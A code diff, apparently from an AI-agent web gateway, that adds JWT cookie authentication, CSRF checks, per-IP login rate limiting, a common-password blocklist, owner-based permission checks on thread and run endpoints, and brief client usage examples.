    if isinstance(payload, TokenError):
        raise HTTPException(
            status_code=401,
            detail=AuthErrorResponse(code=token_error_to_code(payload), message=f"Token error: {payload.value}").model_dump(),
        )

    provider = get_local_provider()
    user = await provider.get_user(payload.sub)
    if user is None:
        raise HTTPException(
            status_code=401,
            detail=AuthErrorResponse(code=AuthErrorCode.USER_NOT_FOUND, message="User not found").model_dump(),
        )

    # Token version mismatch → password was changed, token is stale
    if user.token_version != payload.ver:
        raise HTTPException(
            status_code=401,
            detail=AuthErrorResponse(code=AuthErrorCode.TOKEN_INVALID, message="Token revoked (password changed)").model_dump(),
        )

    return user


async def get_optional_user_from_request(request: Request):
    """Get optional authenticated user from request.

    Returns None if not authenticated.
    """
    try:
        return await get_current_user_from_request(request)
    except HTTPException:
        return None


async def get_current_user(request: Request) -> str | None:
    """Extract user_id from request cookie, or None if not authenticated.

    Thin adapter that returns the string id for callers that only need
    identification (e.g., ``feedback.py``). Full-user callers should use
    ``get_current_user_from_request`` or ``get_optional_user_from_request``.
    """
    user = await get_optional_user_from_request(request)
    return str(user.id) if user else None
@@ -0,0 +1,106 @@
"""LangGraph Server auth handler — shares JWT logic with Gateway.

Loaded by LangGraph Server via langgraph.json ``auth.path``.
Reuses the same ``decode_token`` / ``get_auth_config`` as Gateway,
so both modes validate tokens with the same secret and rules.

Two layers:
1. @auth.authenticate — validates JWT cookie, extracts user_id,
   and enforces CSRF on state-changing methods (POST/PUT/DELETE/PATCH)
2. @auth.on — returns metadata filter so each user only sees own threads
"""

import secrets

from langgraph_sdk import Auth

from app.gateway.auth.errors import TokenError
from app.gateway.auth.jwt import decode_token
from app.gateway.deps import get_local_provider

auth = Auth()

# Methods that require CSRF validation (state-changing per RFC 7231).
_CSRF_METHODS = frozenset({"POST", "PUT", "DELETE", "PATCH"})


def _check_csrf(request) -> None:
    """Enforce Double Submit Cookie CSRF check for state-changing requests.

    Mirrors Gateway's CSRFMiddleware logic so that LangGraph routes
    proxied directly by nginx have the same CSRF protection.
    """
    method = getattr(request, "method", "") or ""
    if method.upper() not in _CSRF_METHODS:
        return

    cookie_token = request.cookies.get("csrf_token")
    header_token = request.headers.get("x-csrf-token")

    if not cookie_token or not header_token:
        raise Auth.exceptions.HTTPException(
            status_code=403,
            detail="CSRF token missing. Include X-CSRF-Token header.",
        )

    if not secrets.compare_digest(cookie_token, header_token):
        raise Auth.exceptions.HTTPException(
            status_code=403,
            detail="CSRF token mismatch.",
        )


@auth.authenticate
async def authenticate(request):
    """Validate the session cookie, decode JWT, and check token_version.

    Same validation chain as Gateway's get_current_user_from_request:
    cookie → decode JWT → DB lookup → token_version match
    Also enforces CSRF on state-changing methods.
    """
    # CSRF check before authentication so forged cross-site requests
    # are rejected early, even if the cookie carries a valid JWT.
    _check_csrf(request)

    token = request.cookies.get("access_token")
    if not token:
        raise Auth.exceptions.HTTPException(
            status_code=401,
            detail="Not authenticated",
        )

    payload = decode_token(token)
    if isinstance(payload, TokenError):
        raise Auth.exceptions.HTTPException(
            status_code=401,
            detail=f"Token error: {payload.value}",
        )

    user = await get_local_provider().get_user(payload.sub)
    if user is None:
        raise Auth.exceptions.HTTPException(
            status_code=401,
            detail="User not found",
        )
    if user.token_version != payload.ver:
        raise Auth.exceptions.HTTPException(
            status_code=401,
            detail="Token revoked (password changed)",
        )

    return payload.sub


@auth.on
async def add_owner_filter(ctx: Auth.types.AuthContext, value: dict):
    """Inject owner_id metadata on writes; filter by owner_id on reads.

    Gateway stores thread ownership as ``metadata.owner_id``.
    This handler ensures LangGraph Server enforces the same isolation.
    """
    # On create/update: stamp owner_id into metadata
    metadata = value.setdefault("metadata", {})
    metadata["owner_id"] = ctx.user.identity

    # Return filter dict — LangGraph applies it to search/read/delete
    return {"owner_id": ctx.user.identity}
@@ -7,6 +7,7 @@ from urllib.parse import quote
from fastapi import APIRouter, HTTPException, Request
from fastapi.responses import FileResponse, PlainTextResponse, Response

from app.gateway.authz import require_permission
from app.gateway.path_utils import resolve_thread_virtual_path

logger = logging.getLogger(__name__)
@@ -81,6 +82,7 @@ def _extract_file_from_skill_archive(zip_path: Path, internal_path: str) -> byte
    summary="Get Artifact File",
    description="Retrieve an artifact file generated by the AI agent. Text and binary files can be viewed inline, while active web content is always downloaded.",
)
@require_permission("threads", "read", owner_check=True)
async def get_artifact(thread_id: str, path: str, request: Request, download: bool = False) -> Response:
    """Get an artifact file by its path.

@@ -0,0 +1,418 @@
"""Authentication endpoints."""

import logging
import os
import time
from ipaddress import ip_address, ip_network

from fastapi import APIRouter, Depends, HTTPException, Request, Response, status
from fastapi.security import OAuth2PasswordRequestForm
from pydantic import BaseModel, EmailStr, Field, field_validator

from app.gateway.auth import (
    UserResponse,
    create_access_token,
)
from app.gateway.auth.config import get_auth_config
from app.gateway.auth.errors import AuthErrorCode, AuthErrorResponse
from app.gateway.csrf_middleware import is_secure_request
from app.gateway.deps import get_current_user_from_request, get_local_provider

logger = logging.getLogger(__name__)

router = APIRouter(prefix="/api/v1/auth", tags=["auth"])


# ── Request/Response Models ──────────────────────────────────────────────


class LoginResponse(BaseModel):
    """Response model for login — token only lives in HttpOnly cookie."""

    expires_in: int  # seconds
    needs_setup: bool = False


# Top common-password blocklist. Drawn from the public SecLists "10k worst
# passwords" set, lowercased + length>=8 only (shorter ones already fail
# the min_length check). Kept tight on purpose: this is the **lower bound**
# defense, not a full HIBP / passlib check, and runs in-process per request.
_COMMON_PASSWORDS: frozenset[str] = frozenset(
    {
        "password",
        "password1",
        "password12",
        "password123",
        "password1234",
        "12345678",
        "123456789",
        "1234567890",
        "qwerty12",
        "qwertyui",
        "qwerty123",
        "abc12345",
        "abcd1234",
        "iloveyou",
        "letmein1",
        "welcome1",
        "welcome123",
        "admin123",
        "administrator",
        "passw0rd",
        "p@ssw0rd",
        "monkey12",
        "trustno1",
        "sunshine",
        "princess",
        "football",
        "baseball",
        "superman",
        "batman123",
        "starwars",
        "dragon123",
        "master123",
        "shadow12",
        "michael1",
        "jennifer",
        "computer",
    }
)


def _password_is_common(password: str) -> bool:
    """Case-insensitive blocklist check.

    Lowercases the input so trivial mutations like ``Password`` /
    ``PASSWORD`` are also rejected. Does not normalize digit substitutions
    (``p@ssw0rd`` is included as a literal entry instead) — keeping the
    rule cheap and predictable.
    """
    return password.lower() in _COMMON_PASSWORDS


def _validate_strong_password(value: str) -> str:
    """Pydantic field-validator body shared by Register + ChangePassword.

    Constraint = function, not type-level mixin. The two request models
    have no "is-a" relationship; they only share the password-strength
    rule. Lifting it into a free function lets each model bind it via
    ``@field_validator(field_name)`` without inheritance gymnastics.
    """
    if _password_is_common(value):
        raise ValueError("Password is too common; choose a stronger password.")
    return value


class RegisterRequest(BaseModel):
    """Request model for user registration."""

    email: EmailStr
    password: str = Field(..., min_length=8)

    _strong_password = field_validator("password")(classmethod(lambda cls, v: _validate_strong_password(v)))


class ChangePasswordRequest(BaseModel):
    """Request model for password change (also handles setup flow)."""

    current_password: str
    new_password: str = Field(..., min_length=8)
    new_email: EmailStr | None = None

    _strong_password = field_validator("new_password")(classmethod(lambda cls, v: _validate_strong_password(v)))


class MessageResponse(BaseModel):
    """Generic message response."""

    message: str


# ── Helpers ───────────────────────────────────────────────────────────────


def _set_session_cookie(response: Response, token: str, request: Request) -> None:
    """Set the access_token HttpOnly cookie on the response."""
    config = get_auth_config()
    is_https = is_secure_request(request)
    response.set_cookie(
        key="access_token",
        value=token,
        httponly=True,
        secure=is_https,
        samesite="lax",
        max_age=config.token_expiry_days * 24 * 3600 if is_https else None,
    )


# ── Rate Limiting ────────────────────────────────────────────────────────
# In-process dict — not shared across workers. Sufficient for single-worker deployments.

_MAX_LOGIN_ATTEMPTS = 5
_LOCKOUT_SECONDS = 300  # 5 minutes

# ip → (fail_count, lock_until_timestamp)
_login_attempts: dict[str, tuple[int, float]] = {}


def _trusted_proxies() -> list:
    """Parse ``AUTH_TRUSTED_PROXIES`` env var into a list of ip_network objects.

    Comma-separated CIDR or single-IP entries. Empty / unset = no proxy is
    trusted (direct mode). Invalid entries are skipped with a logger warning.
    Read live so env-var overrides take effect immediately and tests can
    ``monkeypatch.setenv`` without poking a module-level cache.
    """
    raw = os.getenv("AUTH_TRUSTED_PROXIES", "").strip()
    if not raw:
        return []
    nets = []
    for entry in raw.split(","):
        entry = entry.strip()
        if not entry:
            continue
        try:
            nets.append(ip_network(entry, strict=False))
        except ValueError:
            logger.warning("AUTH_TRUSTED_PROXIES: ignoring invalid entry %r", entry)
    return nets


def _get_client_ip(request: Request) -> str:
    """Extract the real client IP for rate limiting.

    Trust model:

    - The TCP peer (``request.client.host``) is always the baseline. It is
      whatever the kernel reports as the connecting socket — unforgeable
      by the client itself.
    - ``X-Real-IP`` is **only** honored if the TCP peer is in the
      ``AUTH_TRUSTED_PROXIES`` allowlist (set via env var, comma-separated
      CIDR or single IPs). When set, the gateway is assumed to be behind a
      reverse proxy (nginx, Cloudflare, ALB, …) that overwrites
      ``X-Real-IP`` with the original client address.
    - With no ``AUTH_TRUSTED_PROXIES`` set, ``X-Real-IP`` is silently
      ignored — closing the bypass where any client could rotate the
      header to dodge per-IP rate limits in dev / direct-gateway mode.

    ``X-Forwarded-For`` is intentionally NOT used because it is naturally
    client-controlled at the *first* hop and the trust chain is harder to
    audit per-request.
    """
    peer_host = request.client.host if request.client else None

    trusted = _trusted_proxies()
    if trusted and peer_host:
        try:
            peer_ip = ip_address(peer_host)
            if any(peer_ip in net for net in trusted):
                real_ip = request.headers.get("x-real-ip", "").strip()
                if real_ip:
                    return real_ip
        except ValueError:
            # peer_host wasn't a parseable IP (e.g. "unknown") — fall through
            pass

    return peer_host or "unknown"


def _check_rate_limit(ip: str) -> None:
    """Raise 429 if the IP is currently locked out."""
    record = _login_attempts.get(ip)
    if record is None:
        return
    fail_count, lock_until = record
    if fail_count >= _MAX_LOGIN_ATTEMPTS:
        if time.time() < lock_until:
            raise HTTPException(
                status_code=429,
                detail="Too many login attempts. Try again later.",
            )
        del _login_attempts[ip]


_MAX_TRACKED_IPS = 10000


def _record_login_failure(ip: str) -> None:
    """Record a failed login attempt for the given IP."""
    # Evict expired lockouts when dict grows too large
    if len(_login_attempts) >= _MAX_TRACKED_IPS:
        now = time.time()
        expired = [k for k, (c, t) in _login_attempts.items() if c >= _MAX_LOGIN_ATTEMPTS and now >= t]
        for k in expired:
            del _login_attempts[k]
        # If still too large, evict cheapest-to-lose half: below-threshold
        # IPs (lock_until=0.0) sort first, then earliest-expiring lockouts.
        if len(_login_attempts) >= _MAX_TRACKED_IPS:
            by_time = sorted(_login_attempts.items(), key=lambda kv: kv[1][1])
            for k, _ in by_time[: len(by_time) // 2]:
                del _login_attempts[k]

    record = _login_attempts.get(ip)
    if record is None:
        _login_attempts[ip] = (1, 0.0)
    else:
        new_count = record[0] + 1
        lock_until = time.time() + _LOCKOUT_SECONDS if new_count >= _MAX_LOGIN_ATTEMPTS else 0.0
        _login_attempts[ip] = (new_count, lock_until)


def _record_login_success(ip: str) -> None:
    """Clear failure counter for the given IP on successful login."""
    _login_attempts.pop(ip, None)


# ── Endpoints ─────────────────────────────────────────────────────────────


@router.post("/login/local", response_model=LoginResponse)
async def login_local(
    request: Request,
    response: Response,
    form_data: OAuth2PasswordRequestForm = Depends(),
):
    """Local email/password login."""
    client_ip = _get_client_ip(request)
    _check_rate_limit(client_ip)

    user = await get_local_provider().authenticate({"email": form_data.username, "password": form_data.password})

    if user is None:
        _record_login_failure(client_ip)
        raise HTTPException(
            status_code=status.HTTP_401_UNAUTHORIZED,
            detail=AuthErrorResponse(code=AuthErrorCode.INVALID_CREDENTIALS, message="Incorrect email or password").model_dump(),
        )

    _record_login_success(client_ip)
    token = create_access_token(str(user.id), token_version=user.token_version)
    _set_session_cookie(response, token, request)

    return LoginResponse(
        expires_in=get_auth_config().token_expiry_days * 24 * 3600,
        needs_setup=user.needs_setup,
    )


@router.post("/register", response_model=UserResponse, status_code=status.HTTP_201_CREATED)
async def register(request: Request, response: Response, body: RegisterRequest):
    """Register a new user account (always 'user' role).

    Admin is auto-created on first boot. This endpoint creates regular users.
    Auto-login by setting the session cookie.
    """
    try:
        user = await get_local_provider().create_user(email=body.email, password=body.password, system_role="user")
    except ValueError:
        raise HTTPException(
            status_code=status.HTTP_400_BAD_REQUEST,
            detail=AuthErrorResponse(code=AuthErrorCode.EMAIL_ALREADY_EXISTS, message="Email already registered").model_dump(),
        )

    token = create_access_token(str(user.id), token_version=user.token_version)
    _set_session_cookie(response, token, request)

    return UserResponse(id=str(user.id), email=user.email, system_role=user.system_role)


@router.post("/logout", response_model=MessageResponse)
async def logout(request: Request, response: Response):
    """Logout current user by clearing the cookie."""
    response.delete_cookie(key="access_token", secure=is_secure_request(request), samesite="lax")
    return MessageResponse(message="Successfully logged out")


@router.post("/change-password", response_model=MessageResponse)
async def change_password(request: Request, response: Response, body: ChangePasswordRequest):
    """Change password for the currently authenticated user.

    Also handles the first-boot setup flow:
    - If new_email is provided, updates email (checks uniqueness)
    - If user.needs_setup is True and new_email is given, clears needs_setup
    - Always increments token_version to invalidate old sessions
    - Re-issues session cookie with new token_version
    """
    from app.gateway.auth.password import hash_password_async, verify_password_async

    user = await get_current_user_from_request(request)

    if user.password_hash is None:
        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=AuthErrorResponse(code=AuthErrorCode.INVALID_CREDENTIALS, message="OAuth users cannot change password").model_dump())

    if not await verify_password_async(body.current_password, user.password_hash):
        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=AuthErrorResponse(code=AuthErrorCode.INVALID_CREDENTIALS, message="Current password is incorrect").model_dump())

    provider = get_local_provider()

    # Update email if provided
    if body.new_email is not None:
        existing = await provider.get_user_by_email(body.new_email)
        if existing and str(existing.id) != str(user.id):
            raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=AuthErrorResponse(code=AuthErrorCode.EMAIL_ALREADY_EXISTS, message="Email already in use").model_dump())
        user.email = body.new_email

    # Update password + bump version
    user.password_hash = await hash_password_async(body.new_password)
    user.token_version += 1

    # Clear setup flag if this is the setup flow
    if user.needs_setup and body.new_email is not None:
        user.needs_setup = False

    await provider.update_user(user)

    # Re-issue cookie with new token_version
    token = create_access_token(str(user.id), token_version=user.token_version)
    _set_session_cookie(response, token, request)

    return MessageResponse(message="Password changed successfully")


@router.get("/me", response_model=UserResponse)
async def get_me(request: Request):
    """Get current authenticated user info."""
    user = await get_current_user_from_request(request)
    return UserResponse(id=str(user.id), email=user.email, system_role=user.system_role, needs_setup=user.needs_setup)


@router.get("/setup-status")
async def setup_status():
    """Check if admin account exists. Always False after first boot."""
    user_count = await get_local_provider().count_users()
    return {"needs_setup": user_count == 0}


# ── OAuth Endpoints (Future/Placeholder) ─────────────────────────────────


@router.get("/oauth/{provider}")
async def oauth_login(provider: str):
    """Initiate OAuth login flow.

    Redirects to the OAuth provider's authorization URL.
    Currently a placeholder - requires OAuth provider implementation.
    """
    if provider not in ["github", "google"]:
        raise HTTPException(
            status_code=status.HTTP_400_BAD_REQUEST,
            detail=f"Unsupported OAuth provider: {provider}",
        )

    raise HTTPException(
        status_code=status.HTTP_501_NOT_IMPLEMENTED,
        detail="OAuth login not yet implemented",
    )


@router.get("/callback/{provider}")
async def oauth_callback(provider: str, code: str, state: str):
    """OAuth callback endpoint.

    Handles the OAuth provider's callback after user authorization.
    Currently a placeholder.
    """
    raise HTTPException(
        status_code=status.HTTP_501_NOT_IMPLEMENTED,
        detail="OAuth callback not yet implemented",
    )
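A minimal client sketch of the cookie-based login flow above, assuming the gateway is reachable at `http://localhost:8000` and that the `httpx` package is available; the form field names follow `OAuth2PasswordRequestForm` (`username`, `password`), and the credentials are hypothetical:

```python
import httpx

with httpx.Client(base_url="http://localhost:8000") as client:
    # A successful login sets the HttpOnly access_token cookie on the client's cookie jar.
    resp = client.post(
        "/api/v1/auth/login/local",
        data={"username": "admin@example.com", "password": "change-me-please"},
    )
    resp.raise_for_status()
    print(resp.json())  # e.g. {"expires_in": 604800, "needs_setup": false}

    # Subsequent requests reuse the session cookie automatically.
    me = client.get("/api/v1/auth/me")
    print(me.json())
```

Repeated failed logins from one IP trip the in-process lockout (HTTP 429) described in the rate-limiting block, so a test driving this flow should use distinct IPs or clear `_login_attempts` between cases.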
@@ -0,0 +1,132 @@
"""Feedback endpoints — create, list, stats, delete.

Allows users to submit thumbs-up/down feedback on runs,
optionally scoped to a specific message.
"""

from __future__ import annotations

import logging
from typing import Any

from fastapi import APIRouter, HTTPException, Request
from pydantic import BaseModel, Field

from app.gateway.authz import require_permission
from app.gateway.deps import get_current_user, get_feedback_repo, get_run_store

logger = logging.getLogger(__name__)
router = APIRouter(prefix="/api/threads", tags=["feedback"])


# ---------------------------------------------------------------------------
# Request / response models
# ---------------------------------------------------------------------------


class FeedbackCreateRequest(BaseModel):
    rating: int = Field(..., description="Feedback rating: +1 (positive) or -1 (negative)")
    comment: str | None = Field(default=None, description="Optional text feedback")
    message_id: str | None = Field(default=None, description="Optional: scope feedback to a specific message")


class FeedbackResponse(BaseModel):
    feedback_id: str
    run_id: str
    thread_id: str
    owner_id: str | None = None
    message_id: str | None = None
    rating: int
    comment: str | None = None
    created_at: str = ""


class FeedbackStatsResponse(BaseModel):
    run_id: str
    total: int = 0
    positive: int = 0
    negative: int = 0


# ---------------------------------------------------------------------------
# Endpoints
# ---------------------------------------------------------------------------


@router.post("/{thread_id}/runs/{run_id}/feedback", response_model=FeedbackResponse)
@require_permission("threads", "write", owner_check=True, require_existing=True)
async def create_feedback(
    thread_id: str,
    run_id: str,
    body: FeedbackCreateRequest,
    request: Request,
) -> dict[str, Any]:
    """Submit feedback (thumbs-up/down) for a run."""
    if body.rating not in (1, -1):
        raise HTTPException(status_code=400, detail="rating must be +1 or -1")

    user_id = await get_current_user(request)

    # Validate run exists and belongs to thread
    run_store = get_run_store(request)
    run = await run_store.get(run_id)
    if run is None:
        raise HTTPException(status_code=404, detail=f"Run {run_id} not found")
    if run.get("thread_id") != thread_id:
        raise HTTPException(status_code=404, detail=f"Run {run_id} not found in thread {thread_id}")

    feedback_repo = get_feedback_repo(request)
    return await feedback_repo.create(
        run_id=run_id,
        thread_id=thread_id,
        rating=body.rating,
        owner_id=user_id,
        message_id=body.message_id,
        comment=body.comment,
    )


@router.get("/{thread_id}/runs/{run_id}/feedback", response_model=list[FeedbackResponse])
@require_permission("threads", "read", owner_check=True)
async def list_feedback(
    thread_id: str,
    run_id: str,
    request: Request,
) -> list[dict[str, Any]]:
    """List all feedback for a run."""
    feedback_repo = get_feedback_repo(request)
    return await feedback_repo.list_by_run(thread_id, run_id)


@router.get("/{thread_id}/runs/{run_id}/feedback/stats", response_model=FeedbackStatsResponse)
@require_permission("threads", "read", owner_check=True)
async def feedback_stats(
    thread_id: str,
    run_id: str,
    request: Request,
) -> dict[str, Any]:
    """Get aggregated feedback stats (positive/negative counts) for a run."""
    feedback_repo = get_feedback_repo(request)
    return await feedback_repo.aggregate_by_run(thread_id, run_id)


@router.delete("/{thread_id}/runs/{run_id}/feedback/{feedback_id}")
@require_permission("threads", "delete", owner_check=True, require_existing=True)
async def delete_feedback(
    thread_id: str,
    run_id: str,
    feedback_id: str,
    request: Request,
) -> dict[str, bool]:
    """Delete a feedback record."""
    feedback_repo = get_feedback_repo(request)
    # Verify feedback belongs to the specified thread/run before deleting
    existing = await feedback_repo.get(feedback_id)
    if existing is None:
        raise HTTPException(status_code=404, detail=f"Feedback {feedback_id} not found")
    if existing.get("thread_id") != thread_id or existing.get("run_id") != run_id:
        raise HTTPException(status_code=404, detail=f"Feedback {feedback_id} not found in run {run_id}")
    deleted = await feedback_repo.delete(feedback_id)
    if not deleted:
        raise HTTPException(status_code=404, detail=f"Feedback {feedback_id} not found")
    return {"success": True}
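A short usage sketch for the feedback endpoints, assuming an authenticated `httpx` client (session cookie already set, as in the login example earlier) and hypothetical thread/run identifiers:

```python
import httpx

with httpx.Client(base_url="http://localhost:8000") as client:
    thread_id, run_id = "demo-thread", "demo-run"  # hypothetical identifiers

    # Thumbs-up on a run, optionally with a comment.
    resp = client.post(
        f"/api/threads/{thread_id}/runs/{run_id}/feedback",
        json={"rating": 1, "comment": "Helpful answer"},
    )
    print(resp.json())  # FeedbackResponse payload

    # Aggregated counts for the same run.
    stats = client.get(f"/api/threads/{thread_id}/runs/{run_id}/feedback/stats")
    print(stats.json())  # {"run_id": ..., "total": ..., "positive": ..., "negative": ...}
```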
@@ -7,7 +7,7 @@ from fastapi import APIRouter, HTTPException
from pydantic import BaseModel, Field

from app.gateway.path_utils import resolve_thread_virtual_path
from deerflow.agents.lead_agent.prompt import clear_skills_system_prompt_cache
from deerflow.agents.lead_agent.prompt import refresh_skills_system_prompt_cache_async
from deerflow.config.extensions_config import ExtensionsConfig, SkillStateConfig, get_extensions_config, reload_extensions_config
from deerflow.skills import Skill, load_skills
from deerflow.skills.installer import SkillAlreadyExistsError, install_skill_from_archive

@@ -119,6 +119,7 @@ async def install_skill(request: SkillInstallRequest) -> SkillInstallResponse:
    try:
        skill_file_path = resolve_thread_virtual_path(request.thread_id, request.path)
        result = install_skill_from_archive(skill_file_path)
        await refresh_skills_system_prompt_cache_async()
        return SkillInstallResponse(**result)
    except FileNotFoundError as e:
        raise HTTPException(status_code=404, detail=str(e))

@@ -181,7 +182,7 @@ async def update_custom_skill(skill_name: str, request: CustomSkillUpdateRequest
                "scanner": {"decision": scan.decision, "reason": scan.reason},
            },
        )
        clear_skills_system_prompt_cache()
        await refresh_skills_system_prompt_cache_async()
        return await get_custom_skill(skill_name)
    except HTTPException:
        raise

@@ -213,7 +214,7 @@ async def delete_custom_skill(skill_name: str) -> dict[str, bool]:
            },
        )
        shutil.rmtree(skill_dir)
        clear_skills_system_prompt_cache()
        await refresh_skills_system_prompt_cache_async()
        return {"success": True}
    except FileNotFoundError as e:
        raise HTTPException(status_code=404, detail=str(e))

@@ -268,7 +269,7 @@ async def rollback_custom_skill(skill_name: str, request: SkillRollbackRequest)
            raise HTTPException(status_code=400, detail=f"Rollback blocked by security scanner: {scan.reason}")
        atomic_write(skill_file, target_content)
        append_history(skill_name, history_entry)
        clear_skills_system_prompt_cache()
        await refresh_skills_system_prompt_cache_async()
        return await get_custom_skill(skill_name)
    except HTTPException:
        raise

@@ -337,6 +338,7 @@ async def update_skill(skill_name: str, request: SkillUpdateRequest) -> SkillRes

    logger.info(f"Skills configuration updated and saved to: {config_path}")
    reload_extensions_config()
    await refresh_skills_system_prompt_cache_async()

    skills = load_skills(enabled_only=False)
    updated_skill = next((s for s in skills if s.name == skill_name), None)

@@ -1,10 +1,11 @@
import json
import logging

from fastapi import APIRouter
from fastapi import APIRouter, Request
from langchain_core.messages import HumanMessage, SystemMessage
from pydantic import BaseModel, Field

from app.gateway.authz import require_permission
from deerflow.models import create_chat_model

logger = logging.getLogger(__name__)

@@ -98,12 +99,13 @@ def _format_conversation(messages: list[SuggestionMessage]) -> str:
    summary="Generate Follow-up Questions",
    description="Generate short follow-up questions a user might ask next, based on recent conversation context.",
)
async def generate_suggestions(thread_id: str, request: SuggestionsRequest) -> SuggestionsResponse:
    if not request.messages:
@require_permission("threads", "read", owner_check=True)
async def generate_suggestions(thread_id: str, body: SuggestionsRequest, request: Request) -> SuggestionsResponse:
    if not body.messages:
        return SuggestionsResponse(suggestions=[])

    n = request.n
    conversation = _format_conversation(request.messages)
    n = body.n
    conversation = _format_conversation(body.messages)
    if not conversation:
        return SuggestionsResponse(suggestions=[])

@@ -120,7 +122,7 @@ async def generate_suggestions(thread_id: str, request: SuggestionsRequest) -> S
    user_content = f"Conversation Context:\n{conversation}\n\nGenerate {n} follow-up questions"

    try:
        model = create_chat_model(name=request.model_name, thinking_enabled=False)
        model = create_chat_model(name=body.model_name, thinking_enabled=False)
        response = await model.ainvoke([SystemMessage(content=system_instruction), HumanMessage(content=user_content)])
        raw = _extract_response_text(response.content)
        suggestions = _parse_json_string_list(raw) or []

@@ -19,7 +19,8 @@ from fastapi import APIRouter, HTTPException, Query, Request
from fastapi.responses import Response, StreamingResponse
from pydantic import BaseModel, Field

from app.gateway.deps import get_checkpointer, get_run_manager, get_stream_bridge
from app.gateway.authz import require_permission
from app.gateway.deps import get_checkpointer, get_run_event_store, get_run_manager, get_run_store, get_stream_bridge
from app.gateway.services import sse_consumer, start_run
from deerflow.runtime import RunRecord, serialize_channel_values

@@ -53,6 +54,7 @@ class RunCreateRequest(BaseModel):
    after_seconds: float | None = Field(default=None, description="Delayed execution")
    if_not_exists: Literal["reject", "create"] = Field(default="create", description="Thread creation policy")
    feedback_keys: list[str] | None = Field(default=None, description="LangSmith feedback keys")
    follow_up_to_run_id: str | None = Field(default=None, description="Run ID this message follows up on. Auto-detected from latest successful run if not provided.")


class RunResponse(BaseModel):

@@ -92,6 +94,7 @@ def _record_to_response(record: RunRecord) -> RunResponse:


@router.post("/{thread_id}/runs", response_model=RunResponse)
@require_permission("runs", "create", owner_check=True, require_existing=True)
async def create_run(thread_id: str, body: RunCreateRequest, request: Request) -> RunResponse:
    """Create a background run (returns immediately)."""
    record = await start_run(body, thread_id, request)

@@ -99,6 +102,7 @@ async def create_run(thread_id: str, body: RunCreateRequest, request: Request) -


@router.post("/{thread_id}/runs/stream")
@require_permission("runs", "create", owner_check=True, require_existing=True)
async def stream_run(thread_id: str, body: RunCreateRequest, request: Request) -> StreamingResponse:
    """Create a run and stream events via SSE.

@@ -126,6 +130,7 @@ async def stream_run(thread_id: str, body: RunCreateRequest, request: Request) -


@router.post("/{thread_id}/runs/wait", response_model=dict)
@require_permission("runs", "create", owner_check=True, require_existing=True)
async def wait_run(thread_id: str, body: RunCreateRequest, request: Request) -> dict:
    """Create a run and block until it completes, returning the final state."""
    record = await start_run(body, thread_id, request)

@@ -151,6 +156,7 @@ async def wait_run(thread_id: str, body: RunCreateRequest, request: Request) ->


@router.get("/{thread_id}/runs", response_model=list[RunResponse])
@require_permission("runs", "read", owner_check=True)
async def list_runs(thread_id: str, request: Request) -> list[RunResponse]:
    """List all runs for a thread."""
    run_mgr = get_run_manager(request)

@@ -159,6 +165,7 @@ async def list_runs(thread_id: str, request: Request) -> list[RunResponse]:


@router.get("/{thread_id}/runs/{run_id}", response_model=RunResponse)
@require_permission("runs", "read", owner_check=True)
async def get_run(thread_id: str, run_id: str, request: Request) -> RunResponse:
    """Get details of a specific run."""
    run_mgr = get_run_manager(request)

@@ -169,6 +176,7 @@ async def get_run(thread_id: str, run_id: str, request: Request) -> RunResponse:


@router.post("/{thread_id}/runs/{run_id}/cancel")
@require_permission("runs", "cancel", owner_check=True, require_existing=True)
async def cancel_run(
    thread_id: str,
    run_id: str,

@@ -206,6 +214,7 @@ async def cancel_run(


@router.get("/{thread_id}/runs/{run_id}/join")
@require_permission("runs", "read", owner_check=True)
async def join_run(thread_id: str, run_id: str, request: Request) -> StreamingResponse:
    """Join an existing run's SSE stream."""
    bridge = get_stream_bridge(request)

@@ -226,6 +235,7 @@ async def join_run(thread_id: str, run_id: str, request: Request) -> StreamingRe


@router.api_route("/{thread_id}/runs/{run_id}/stream", methods=["GET", "POST"], response_model=None)
@require_permission("runs", "read", owner_check=True)
async def stream_existing_run(
    thread_id: str,
    run_id: str,

@@ -265,3 +275,54 @@ async def stream_existing_run(
            "X-Accel-Buffering": "no",
        },
    )


# ---------------------------------------------------------------------------
# Messages / Events / Token usage endpoints
# ---------------------------------------------------------------------------


@router.get("/{thread_id}/messages")
@require_permission("runs", "read", owner_check=True)
async def list_thread_messages(
    thread_id: str,
    request: Request,
    limit: int = Query(default=50, le=200),
    before_seq: int | None = Query(default=None),
    after_seq: int | None = Query(default=None),
) -> list[dict]:
    """Return displayable messages for a thread (across all runs)."""
    event_store = get_run_event_store(request)
    return await event_store.list_messages(thread_id, limit=limit, before_seq=before_seq, after_seq=after_seq)


@router.get("/{thread_id}/runs/{run_id}/messages")
@require_permission("runs", "read", owner_check=True)
async def list_run_messages(thread_id: str, run_id: str, request: Request) -> list[dict]:
    """Return displayable messages for a specific run."""
    event_store = get_run_event_store(request)
    return await event_store.list_messages_by_run(thread_id, run_id)


@router.get("/{thread_id}/runs/{run_id}/events")
@require_permission("runs", "read", owner_check=True)
async def list_run_events(
    thread_id: str,
    run_id: str,
    request: Request,
    event_types: str | None = Query(default=None),
    limit: int = Query(default=500, le=2000),
) -> list[dict]:
    """Return the full event stream for a run (debug/audit)."""
    event_store = get_run_event_store(request)
    types = event_types.split(",") if event_types else None
    return await event_store.list_events(thread_id, run_id, event_types=types, limit=limit)


@router.get("/{thread_id}/token-usage")
@require_permission("threads", "read", owner_check=True)
async def thread_token_usage(thread_id: str, request: Request) -> dict:
    """Thread-level token usage aggregation."""
    run_store = get_run_store(request)
    agg = await run_store.aggregate_tokens_by_thread(thread_id)
    return {"thread_id": thread_id, **agg}

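A sketch of consuming the `/runs/stream` SSE endpoint from Python with `httpx`; the base URL, thread ID, and request payload shape are assumptions for illustration (the exact `RunCreateRequest` fields are defined in the hunk above), and the client must already carry a valid session cookie:

```python
import httpx

def stream_run_events(thread_id: str) -> None:
    with httpx.Client(base_url="http://localhost:8000", timeout=None) as client:
        with client.stream(
            "POST",
            f"/api/threads/{thread_id}/runs/stream",
            json={"input": {"messages": [{"role": "user", "content": "hello"}]}},  # hypothetical payload
        ) as resp:
            for line in resp.iter_lines():
                if line.startswith("data:"):
                    print(line)  # one SSE data frame per emitted run event
```

`GET /{thread_id}/runs/{run_id}/join` and the messages/events endpoints below it cover the reconnect and audit cases where the original stream was dropped.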
@@ -18,23 +18,34 @@ import uuid
from typing import Any

from fastapi import APIRouter, HTTPException, Request
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, field_validator

